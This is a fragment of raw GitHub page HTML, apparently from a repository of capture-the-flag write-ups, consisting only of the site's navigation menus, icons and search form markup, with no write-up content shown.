aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div> <div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path></svg> <div> <div class="color-fg-default h4">Security</div> Find and fix vulnerabilities </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="481769760" data-scoped-search-url="/not1cyyy/CTF-Writeups/search" data-owner-scoped-search-url="/users/not1cyyy/search" data-unscoped-search-url="/search" data-turbo="false" action="/not1cyyy/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="S5sxqFzeCwswMaQON/cxTB8VLKidRHwJ6AmzF7jZQtrrp2isjv7Fngf1VbzftEEB8pSaytDVYeufn2XSfQcU5Q==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" 